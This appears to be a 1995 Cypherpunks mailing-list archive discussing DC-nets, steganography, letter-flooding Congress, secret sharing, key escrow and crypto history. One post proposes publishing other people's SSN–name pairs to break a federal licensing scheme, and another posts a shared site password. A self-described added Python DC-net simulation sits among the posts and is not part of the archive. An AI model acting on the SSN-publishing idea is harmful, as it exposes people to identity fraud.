Date: Mon, 17 Jul 95 05:57:23 PDT
To: andrewr@realtime.co.za
Subject: Here it is; bi-directional dining cryptographers
In-Reply-To: <C189311569@real3.realtime.co.za>
Message-ID: <199507171252.AA14868@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Andrew, in the longer version of the description, I postulated that
the data broadcast by Alice and Bob would be compressed and without
headers; I was hoping that would be enough to defeat any likely
cryptanalysis.

Hmm... maybe some other format.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 17 Jul 95 05:58:25 PDT
To: andrewr@realtime.co.za
Subject: Here it is; bi-directional dining cryptographers
In-Reply-To: <C189311569@real3.realtime.co.za>
Message-ID: <199507171253.AA14941@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


BTW, they're not added together per se; they're XOR'd together.
Does this make a difference?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Mon, 17 Jul 95 22:47:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Stego Standards Silly ? (
In-Reply-To: <8AD5238.000300015F.uuout@famend.com>
Message-ID: <9507171402.AA22064@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Monster@FAmend.Com writes:
>   Not obvious at all. You encrypt and sign as usual, stego the resultant
> output, and perhaps include in the stego routines some kind of CRC or
> hash if you like. But the point is that the signature still works to
> indicate whether the message was tampered with or not.
> 
>   If we posit a MITM, he can tamper with cyphertext =or= stegotext, but
> he can't defeat the signature. I would receive a GIF which my stego
> software would turn into a file that PGP would puke on, telling me that
> Someone Is Messing With My Mail.

Sure -- for most message passing applications, tampering in transit would
also lead to noticeably corrupted cleartext, when the stegoed ciphertext
is decrypted. Again, PGP pukes, or perhaps Stealth PGP gives me something
obliterated when it decrypts. See my comments below, however.

>   I would not, of course, be able to reveal this fact directly. However,
> I could ask my correspondent to re-send the GIF, and when it comes out
> different in EVERY SINGLE LSB, I have proof of tampering.

Well, you could do that regardless of what is or isn't stegoed into the
carrier image. I'm arguing that perhaps the govt. (or whomever) will be
far less sympathetic to such in-stego-channel evidence of doctoring. 

I still see an obstacle to this approach, though. If we want to try to
foil traffic analysis, then we need people routinely to dispatch ghost
messages. Some of these should go to people with whom the sender is not trying
to communicate. When Karen gets a GIF in the mail, she needs to decide whether
its LSBs are significant (semantically speaking :) or not. If they decrypt
into something meaningful, QED; if not, what to do ?  "Sufficiently
advanced communication is indistinguishable from noise" is a double-edged
sword, after all. Establishing that communication is really being attempted
is trickier under these conditions.

I think I need to clarify my threat model. I'm positing a scenario in which
transmission of ciphertext and stegoed anything is illegal, but transmission
and use of "conspicuous" digital signatures is legal. Furthermore, the govt.
sanitizes the LSBs of digital images for our protection, perhaps distorting
a mean of X% of the LSBs of a mean of Y% of transmitted images. Out-of-stego-
channel checksummation would IMHO be crucial in such a situation.  

-Futplex <futplex@pseudonym.com>   "A kiss and a hug and a couple of f*cks: 
                                    being in love really sucks" -Meryn Cadell



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Mon, 17 Jul 95 08:34:21 PDT
To: cypherpunks@toad.com
Subject: "Zodiac"
Message-ID: <199507171534.IAA22791@well.com>
MIME-Version: 1.0
Content-Type: text/plain



 Neal Stephenson's  novel "Zodiac" (an Eco-thriller) has been re-
released in a new paperback edition. I loved it!

ObCrypto: you'll have to read the book to find out...

Ok....actually none, but Neal's fans here on the list will enjoy
the book!

Flame away....

Brian D Williams
Cypherpatriot

" I'm not a spin Doctor, but I play one on the Internet."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Mon, 17 Jul 95 00:35:40 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD5238.000300015E.uuout@famend.com>
Message-ID: <199507170735.IAA06713@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



MONTY HARDER writes:

| Anyone who has read MAD Magazine could put such together. As an added
| bonus, use variable margin settings, and none of the letters would be
| exactly the same. Appropriate Imail => FAX software on a puter in DC
| (local call that way) with the phone number of the sender filled in on
| the top line for ID (izzat legal?) so it doesn't look like a form letter
| at all.

Plus - choose the fonts & point sizes at random too ? :-)

Martin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 17 Jul 95 09:05:25 PDT
To: CYPHERPUNKS@toad.com
Subject: Automated Rant Generators and Letter Generators
Message-ID: <ac2fd6eb19021004056b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:35 AM 7/17/95, Martin Hamilton wrote:
>MONTY HARDER writes:
>
>| Anyone who has read MAD Magazine could put such together. As an added
>| bonus, use variable margin settings, and none of the letters would be
>| exactly the same. Appropriate Imail => FAX software on a puter in DC
>| (local call that way) with the phone number of the sender filled in on
>| the top line for ID (izzat legal?) so it doesn't look like a form letter
>| at all.
>
>Plus - choose the fonts & point sizes at random too ? :-)

Yes, make your letters to Congressmen look like ransom notes...it really
gets their attention!

Seriously, I have no doubt that the next generation of "direct mail" will
be geared toward automatic generation of personalized letters, using
various natural language parser generators (a la the "rant generator" many
of us have used), variable fonts and margins, and so on.

This will further "flood the channel" and will ultimately make letter
writing mostly meaningless. In my case, I skip most letters to the
editor--at least for local newspapers and weeklies--as they look to be
automatically written ("I am outraged at your article about converting
Lighthouse Point into a nuclear-powered whale-packing plant...").

Cypherpunks could probably have an effect on hastening this "denial of
service" attack on the efficacy of letter-writing by releasing an
easy-to-use package that does all this letter writing at the click of a
button....just type in some key words, for the topics, and it does the
rest.

An interesting project, actually.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Mon, 17 Jul 95 09:39:26 PDT
To: cypherpunks@toad.com
Subject: Windows secret-sharing
Message-ID: <199507171638.JAA14534@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I just uploaded a user-friendly, Windows front-end to Hal Finney's SECSPLIT.EXE (based on Shamir's secret-sharing) called Secret Sharer.  The interface supports splitting and restoring files or passphrases.

Nothing fancy, but a simple solution for Windows users who want to do their own key (or whatever) escrow.

Secret Sharer is freeware, and is available from either:

http://www.eskimo.com/~joelm
ftp.eskimo.com /joelm/secshare.zip

I'm probably being over-cautious, but because of ITAR, SECSPLIT.EXE is not included in the ZIP file.  FTP sites for downloading are listed in the docs though.

Comments, bug reports, etc. appreciated before I announce to the relevant newsgroups.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 17 Jul 95 07:42:11 PDT
To: cypherpunks@toad.com
Subject: Proposed SS#/Federal Job Licensing DOS Attack
Message-ID: <199507171441.KAA02622@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On another subject entirely...

I have naturally been concerned about the Feds' proposal to set up
a national job licensing system.  In order to protect us from
hordes of illegals, they have suggested that employers be required
to check SS#-True Name matches before employment could begin.

This amounts to requiring federal permission for the 55 million 
annual job changes.  Initially, it is supposed to be restricted to
checking SS# validity, name match, and non multiple use.  Later (as with
driver's licenses) they will add restrictions having to do with tax
compliance, child support compliance, library fine compliance, etc.
After all, we wouldn't want tax evading, deadbeat dad, library
scofflaws working in Amerika, would we?

This suggests an interesting Denial of Service (DOS) attack.  If
you published your own or others' SS#-True Name pairs on a public
forum (currently completely legal BTW), multiple use could be 
encouraged, the TrueNames would become unemployable, and interesting
litigation would result.  If done enough, systemic breakdown would
occur.

I am anxious to see the regs (they are just at the talking stage) to
see how they handle "exceptions" like this.

DCF

"Who in spite of the fact that he has changed jobs since November 1986, has
yet to fill out an I-9 form.  He *loves* contract employment." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dursi@lola.phy.QueensU.CA (Jonathan Dursi)
Date: Mon, 17 Jul 95 08:00:43 PDT
To: cypherpunks@toad.com
Subject: Re: Free The World Web Server project.. :)
Message-ID: <9507171456.AA16986@duke>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> >  Especially if the form letter generated would be randomly selected
> >from parallel word streams.  For example:
> [...]
> >  You get the idea.

> Rather than spend five minutes writing something on your own you'd end
> up something that looks totally fake.  I believe that what is going on
> would be discerned by a staffer in moments. 

Well, it would be just as easy (although, admittedly, somewhat less
convenient to the users) to have the web page such that the users could
type in the letter, with some ``suggested text'' (perhaps randomly 
generated as above), perhaps even as the default; then it's just a matter
of editing a few sentences, and maybe adding a paragraph or two...  then
click, and it's off.

It wouldn't be as convenient as just-click-and-a-letter-will-be-sent,
but it's still more convenient than having to write the letter yourself,
which means that it'll generate more traffic...

	- Jonathan
- ---
Jonathan Dursi               |  "Never attribute to malice 
dursi@astro.queensu.ca       |   what can adequately be explained 
                             |   by stupidity."  - Hanlon's Razor

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQBVAgUBMAp5/BJH45PFiKyNAQGYJQH/Uo3k45i73U8qQA1/y5LeXPso07LAPCwo
5i0xkFudoK2/Q5H7Gm7xmygNXIkckhuK/X/kJvdCf2khRluP8y/c7w==
=jwye
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 17 Jul 95 08:09:20 PDT
To: bdavis@thepoint.net
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.D-G.3.91.950716003841.26405B-100000@dg.thepoint.net>
Message-ID: <9507171457.AA09146@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 16 Jul 1995 00:41:03 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>
>
>On Fri, 14 Jul 1995, Carl Ellison wrote:
>...
>>   The last
>> $9M (I believe it was) went to buying up AT&T DES phones to be made into
>> Clipper phones.  Of course, the conversion hasn't happened yet and the DES
>> phones are sitting in a warehouse someplace -- but the $9M fund went to
>		^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Nope.  There is one right here in my office.  And it makes me feel so 
>safe and secure.

The $9M didn't buy *all* of the AT&T phones.  TIS has 2 of them.  Bruce
Schneier has 1.  Whit Diffie has one that I've seen.

However, all the ones it did buy are apparently in a warehouse, gathering
dust.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 17 Jul 95 08:39:14 PDT
To: jim@acm.org
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507171504.LAA07652@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:18 AM 7/15/95 PDT, Jim Gillogly wrote:
>
>> silly@ugcs.caltech.edu ((me)) writes:
>> Help!   What does GAK stand for?  I've seen it a billion times,
>
>Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
>descriptive and accurate than calling it Key Escrow, since escrow is for
>the benefit of the parties involved in a transaction. 

Or we might use Sandy Sandfort's suggestion "key forfeiture" derived from asset forfeiture.

DCF

"Isn't it peculiar how nature doth contrive that every boy and every girl who's born into this world alive is either a little libertarian or else a little goddamn fascist bastard." -- Just getting it out of my system before Exon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 17 Jul 95 10:29:23 PDT
To: futplex@pseudonym.com
Subject: Re: bi-directional dining cryptographers
In-Reply-To: <9507171256.AA20139@cs.umass.edu>
Message-ID: <199507171724.AA15346@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm rereading my mail at once; I've forgotten if I told you this
already.

Anyway, I just presupposed the same protocol outlined by Chaum in
his paper. It's disruptable, but so's any DC-net to begin with.

DC-nets presuppose a fair amount of co-operation between their
participants.

I'd also like to point out that this system indicates that during
an attack/disruption on a traditional dc-net, the disruptor can 
tell what the original person was trying to send, even though no one
else can.

And then perhaps XOR the data with something offensive, and if the
original sender tries to re-send, broadcast the result of the XOR,
resulting in a total net output of the offensive material.

I'm sure someone's going to try that sooner or later.

Phil
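
An added example, not part of any post in this thread: a small DC-net simulation covering the points raised in the "bi-directional dining cryptographers" messages (two senders sharing one slot, Mark Grant's remark about PGP key IDs at the start of a message, and the note above that a disruptor learns what the original sender transmitted). Participant names, key IDs and messages are constructed, and modelling a message as "recipient's 8-byte key ID followed by the body" is a simplifying assumption.

```python
import secrets
from itertools import combinations

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def dc_round(names, length, sending):
    """One DC-net round. Every pair shares a fresh random pad; each
    participant broadcasts the XOR of its pads, plus its message if it has
    one. Returns (per-participant broadcasts, XOR of all broadcasts)."""
    pads = {frozenset(p): secrets.token_bytes(length)
            for p in combinations(names, 2)}
    outs = {}
    for n in names:
        out = sending.get(n, b"").ljust(length, b"\0")
        for other in names:
            if other != n:
                out = xor(out, pads[frozenset((n, other))])
        outs[n] = out
    total = bytes(length)
    for out in outs.values():
        total = xor(total, out)   # every pad appears twice and cancels
    return outs, total

def pairs_matching_prefix(total, key_ids):
    """Observer's check: which pairs of known key IDs XOR to the slot's
    first bytes? A match suggests those two are talking to each other."""
    n = len(next(iter(key_ids.values())))
    return sorted(tuple(sorted(p)) for p in combinations(key_ids, 2)
                  if xor(key_ids[p[0]], key_ids[p[1]]) == total[:n])

NAMES = ["alice", "bob", "carol", "dave"]
# Constructed 8-byte key IDs, chosen so every pairwise XOR is distinct.
KEY_IDS = {"alice": b"\x01" * 8, "bob": b"\x02" * 8,
           "carol": b"\x04" * 8, "dave": b"\x08" * 8}

def demo():
    length = 32
    # Bi-directional slot: Alice and Bob transmit at the same time.
    m_a = KEY_IDS["bob"] + b"meet at noon"       # header = recipient key ID
    m_b = KEY_IDS["alice"] + b"ok, usual place"
    _, total = dc_round(NAMES, length, {"alice": m_a, "bob": m_b})
    # Bob removes his own message from the slot to read Alice's.
    bob_reads = xor(total, m_b.ljust(length, b"\0")).rstrip(b"\0")
    # Everyone else sees only m_a XOR m_b, but the known headers leak the pair.
    leaked_with_headers = pairs_matching_prefix(total, KEY_IDS)
    # Same exchange with the headers stripped, as suggested in the thread.
    _, total2 = dc_round(NAMES, length, {"alice": m_a[8:], "bob": m_b[8:]})
    leaked_without_headers = pairs_matching_prefix(total2, KEY_IDS)
    # Disruption: Carol sends, Dave injects noise d into the same slot.
    m, d = b"carol's slot", secrets.token_bytes(length)
    _, total3 = dc_round(NAMES, length, {"carol": m, "dave": d})
    dave_learns = xor(total3, d).rstrip(b"\0")   # only Dave knows d
    others_see = total3                          # garbage to everyone else
    return (bob_reads, leaked_with_headers, leaked_without_headers,
            dave_learns, others_see)

if __name__ == "__main__":
    for item in demo():
        print(item)
```

The disrupted slot carries m XOR d, so it is unreadable to everyone except the party who knows d; detecting and tracing such a disruptor is a separate problem that this sketch does not address.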




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 17 Jul 95 12:31:29 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Automated Rant Generators and Letter Generators
In-Reply-To: <ac2fd6eb19021004056b@[205.199.118.202]>
Message-ID: <199507171929.MAA18513@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Cypherpunks could probably have an effect on hastening this "denial of
> service" attack on the efficacy of letter-writing by releasing an
> easy-to-use package that does all this letter writing at the click of a
> button....just type in some key words, for the topics, and it does the
> rest.
> 
> An interesting project, actually.
> 
> --Tim May
> 
    A final step might be to interface the output to old pen plotters
    like my HP7470A with an ascii-to-handwriting program.  Akin to
    the White House souvenir signature generator, but with a set of
    parameters to mimic different "hands".  Knuth's Metafont tricks 
    come to mind. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 17 Jul 95 13:05:07 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <9507171938.AA03018@mondo.ab.com>
Message-ID: <199507172003.NAA22114@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> What's CFR?

I'll take a wild guess and say the Council on Foreign Relations or 
some such thing.  If memory serves me correctly, David Sternlight
is a member.

BTW, I'm back on the list after a few months of working on a 
project.  Did I miss anything interesting?  PGP hasn't been
broken in some trivial fashion, I hope. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 17 Jul 95 12:08:54 PDT
To: wb8foz@nrk.com
Subject: Re: TIME pathfinder registration
In-Reply-To: <m0sXxKb-0005BTC@nrk.com>
Message-ID: <199507171908.NAA23963@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> I note someone has used "cypherpunks" as a login for TIME Mag's
> WWW service.
> 
> I'd guess it was in the spirit of other such enrollments.
> If so, what's the password?

This was me. The password is "writecode", since Pathfinder didn't allow
the login and password to be the same.

                              -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 17 Jul 95 11:37:15 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: RC4 crack
Message-ID: <Pine.ULT.3.91.950717133656.23201A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

So what was the result of the RC4 key cracking thing that happened last 
week?  It's at 100% but that's all it says.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAqt9DokqlyVGmCFAQGxTgP/X6Cm7RfWOeWrzI52ws/cibtnZ/jJ6nTV
8MrWam8ZziWmq3fZeovLU/6sz2CAVBN9msqxo3H0AFTRLBrv1ZRuDj1bCzMEcsXW
JSFiUleDUOliF3qGQMTU9PyaekVr8Kc/OdiHcJhWm5xZjbYA+yvrcwUYCUR/vKBw
UPyL29Jx0L4=
=xMlz
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Mon, 17 Jul 95 09:26:13 PDT
To: liberty@gate.net
Subject: Re: Root Causes
Message-ID: <2448@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Jim didn't take my Con Law I course.

In message <199507161819.OAA06090@bb.hks.net> Jim Ray writes:
[cuts throughout]
> 
> Amendment IX -- "The enumeration in the Constitution of certain rights
> shall not be construed to deny or disparage others retained by the people."
                                                      ^^^^^^^ 
> [The right to write code was among many rights NOT enumerated.]
> 

Very hard to argue that the right to write code (as opposed to, 
say, the right to write in code) existed in the late 18th 
century; hence it is hard to argue that it could be "retained" 
today.  

Assuming that the ninth amendment has, or could have, teeth, it 
is unlikely to go beyond rights existing or closely analogous to 
those held by "the people" [free white males, more likely] at 
the time of the amendment's ratification.  Just as well if you 
think about it carefully.

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 17 Jul 95 10:51:10 PDT
To: cypherpunks@toad.com
Subject: WSJ on remailers...
Message-ID: <ac30554a20021004de28@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



The WSJ has an article on anonymous remailers buried in the B section. It
is pretty straightforward and ends up quoting some Finnish police officer
saying that they're not going to go raiding remailers on any suspicion.
They'll need a real crime.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 17 Jul 95 10:18:29 PDT
To: roger@coelacanth.com (Roger Williams)
Subject: Re: speeding detected by civilians
In-Reply-To: <rogerohyxp80a.fsf@sturgeon.coelacanth.com>
Message-ID: <m0sXuVC-0009tMC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In article <3u4g3t$pn8@nntp.crl.com> Buzz@static.noise.net (Buzz White) writes:
> 
>    >> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
>    >> citizens to check out radar guns from the local police department to 
>    >> catch speeders in their community. The radar guns are combined with 
>    >> cameras in order to instantaneously capture the car, license number, and the 
>    >> rate of speed. The citizens can check out the units for a week at a time. The 
>    >> police have stated that they, at this time, will use the data to issue 
>    >> warning letters to the violators.
> 
>    Can they use them to bust COPS that speed?   Heh heh.
> 
> If Vernon Hills has any citizens left with spines, you can bet that
> the local police are going to start to get a couple hundred pictures
> of cop cars per week... Hell, I'll bet that I could take that many
> by *myself* :)

I'm absolutely dying to do that with cops around here (N.VA/Tysons) area...

I got a ticket at 2:30 AM while my car was on cruise at 55MPH, almost
no hills, guy said he 'paced' me for about a mile doing 70 2-3 miles
before he stopped me, yet he was too lazy to use his radar...
I paid $40 and spent a few hours getting an officially certified
speedometer test, etc.

Still trying to go to court: first date was for July 3rd, which they
decided at the last minute to take as vacation, told me to appear
July 5th, when I found out that the continuance was for Aug 9.  (For
a June 5th or so ticket.)

After 50 calls to the court house trying to get through, I found out
that the officers don't even have to turn in paperwork unless I don't
pay the bond and then they just turn it in 4-5 days before the court
date.

The parking meter at the courthouse was fraudulent (20 min for my $.25 for
30 min fee), and I've noted numerous speeding and illegal Uturns, parking
in active roadways without lights, etc. offences by local police...

sdw

> -- 
> Roger Williams  --  Coelacanth Engineering  --  Middleborough, Mass

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 17 Jul 95 11:11:28 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Root Causes Roots
Message-ID: <199507171809.OAA76923@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Professor Froomkin writes:

>Jim didn't take my Con Law I course.

True, and from what I hear, I regret not taking it. 

>
>In message <199507161819.OAA06090@bb.hks.net> Jim Ray writes:
>[cuts throughout]
>> 
>> Amendment IX -- "The enumeration in the Constitution of certain rights
>> shall not be construed to deny or disparage others retained by the people."
>                                                      ^^^^^^^ 
>> [The right to write code was among many rights NOT enumerated.]
>> 
>
>Very hard to argue that the right to write code (as opposed to, 
>say, the right to write in code) 

A distinction my feeble mind fails to grasp, as doing the one is required
in order to even make the other possible. [Now all can see why I had 
so much trouble in law school.]

>existed in the late 18th century; 

A short trip to:"CME's cryptography timeline" [Recently suggested 
on this list] and found at URL:

http://www.clark.net/pub/cme/html/timeline.html  

Reveals some interesting code-history.

[In case the good professor or others on the list are without a
SLIP/PPP connection, a not-so-short excerpt from CME's cryptography
timeline follows]:

_____________________________________________________________


- - From David Kahn's ``The Codebreakers'': 

     ``It must be that as soon as a culture has reached a certain level,
probably measured largely by its literacy, cryptography appears
spontaneously -- as its parents, language and writing, probably also 
did. The multiple human needs and desires that demand privacy among 
two or more people in the midst of social life must inevitably lead to
cryptology wherever men thrive and wherever they write. Cultural 
diffusion seems a less likely explanation for its occurrence in so many
areas, many of them distant and isolated.'' [p. 84] 

The invention of cryptography is not limited to either civilians or the 
government. Wherever the need for secrecy is felt, the invention occurs. 
However, over time the quality of the best available system continues to 
improve and those best systems were often invented by civilians.
Again, from David Kahn: 

     ``It was the amateurs of cryptology who created the species. The 
professionals, who almost certainly surpassed them in cryptanalytic 
expertise, concentrated on down-to-earth problems of the systems that 
were then in use but are now outdated.
     The amateurs, unfettered to those realities, soared into the 
empyrean of theory.'' [pp. 125-6] 

In the list to follow (until I learn how to make tables in HTML), each
description starts with (date; civ or govt; source). Sources are 
identified in full at the end. 

      about 1900 BC; civ; Kahn p.71; an Egyptian scribe used non-standard 
hieroglyphs in an inscription. Kahn lists this as the first documented 
example of written cryptography. 

      1500 BC; civ; Kahn p.75; a Mesopotamian tablet contains an enciphered 
formula for the making of glazes for pottery. 

      500-600 BC; civ; Kahn p.77; Hebrew scribes writing down the book of 
Jeremiah used a reversed-alphabet simple substitution cipher known as 
ATBASH. (Jeremiah started dictating to Baruch in 605 BC but the chapters 
containing these bits of cipher are attributed to a source labeled ``C'' 
(believed not to be Baruch) which could be an editor writing after the 
Babylonian exile in 587 BC, someone contemporaneous with Baruch or even 
Jeremiah himself.)
     ATBASH was one of a few Hebrew ciphers of the time. 

      487 BC; govt; Kahn p.82; the Greeks used a device called the 
``skytale'' -- a staff around which a long, thin strip of leather was 
wrapped and written on. The leather was taken off and worn as a belt. 
Presumably, the recipient would have a matching staff and the encrypting 
staff would be left home. 

      50-60 BC; govt; Kahn p.83; Julius Caesar (100-44 BC) used a simple 
substitution with the normal alphabet (just shifting the letters a fixed 
amount) in government communications. This cipher was less strong than 
ATBASH, by a small amount, but in a day when few people read in the first 
place, it was good enough.

<SNIP! Off to some [slightly] more modern times.>

1564; civ; Kahn p.144(footnote); Bellaso published an autokey cipher 
improving on the work of Cardano who appears to have invented the idea. 

      1623; civ; Bacon; Sir Francis Bacon described a cipher which now 
bears his name -- a biliteral cipher, known today as a 5-bit binary 
encoding. He advanced it as a steganographic device -- by using variation 
in type face to carry each bit of the encoding. 

      1585; civ; Kahn p.146; Blaise de Vigenère wrote a book on ciphers, 
including the first authentic plaintext and ciphertext autokey systems 
(in which previous plaintext or ciphertext letters are used for the 
current letter's key). [Kahn p.147: both of these were forgotten and
re-invented late in the 19th century.] [The autokey idea survives today
in the DES CBC and CFB modes.] 

      1790's; civ/govt; Kahn p.192, Cryptologia v.5 No.4 pp.193-208; Thomas 
Jefferson, possibly aided by Dr. Robert Patterson (a mathematician at U. 
Penn.), invented his wheel cipher. This was re-invented in several forms 
later and used in WW-II by the US Navy as the Strip Cipher, M-138-A. 

      1817; govt; Kahn p.195; Colonel Decius Wadsworth produced a geared 
cipher disk with a different number of letters in the plain and cipher 
alphabets -- resulting in a progressive cipher in which alphabets are used 
irregularly, depending on the plaintext used. 

      1854; civ; Kahn p.198; Charles Wheatstone invented what has become 
known as the Playfair cipher, having been publicized by his friend Lyon 
Playfair. This cipher uses a keyed array of letters to make a digraphic 
cipher which is easy to use in the field. He also re-invented the 
Wadsworth device and is known for that one. 

      1857; civ; Kahn p.202; Admiral Sir Francis Beaufort's cipher (a 
variant of what's called ``Vigenère'') was published by his brother, 
after the admiral's death in the form of a 4x5 inch card. 

      1859; civ; Kahn p.203; Pliny Earle Chase published the first 
description of a fractionating (tomographic) cipher. 

      1854; civ; Cryptologia v.5 No.4 pp.193-208; Charles Babbage seems to 
have re-invented the wheel cipher. 

      1861-1980; civ; Deavours; 
          ``A study of United States patents from the issuance of the 
first cryptographic patent in 1861 through 1980 identified 1,769 
patents which are primarily related to cryptography.'' [p.1] 

      1861; civ/(govt); Kahn p.207; Friedrich W. Kasiski published a book 
giving the first general solution of a polyalphabetic cipher with 
repeating passphrase, thus marking the end of several hundred years of 
strength for the polyalphabetic cipher. 

      1861-5; govt; Kahn p.215; during the Civil War, possibly among other 
ciphers, the Union used substitution of select words followed by word 
columnar-transposition while the Confederacy used Vigenère (the solution 
of which had just been published by Kasiski). 

      1891; govt/(civ); Cryptologia v.5 No.4 pp.193-208; Major Etienne 
Bazeries did his version of the wheel cipher and published the design 
in 1901 after the French Army rejected it. [Even though he was a military 
cryptologist, the fact that he published it leads me to rate this as (civ)
as well as govt.] 
<SNIP>
______________________________________________________________
End of copy from "CME's cryptography timeline." Thanks [and apologies]
to David Kahn, whose 1960s book is well worth buying, even today.
______________________________________________________________

Professor Froomkin continues:

>hence it is hard to argue that it could be "retained" 
>today.  

In view of the foregoing timeline excerpts, I would 
respectfully disagree.

>
>Assuming that the ninth amendment has, or could have, teeth,

[I am certain it _would_, with ballot-access-fairness reform,
but that's a side issue, like abortion, that should *not*
occupy this list. I am, however, quite willing to discuss it
by private e-mail. JMR]

>it 
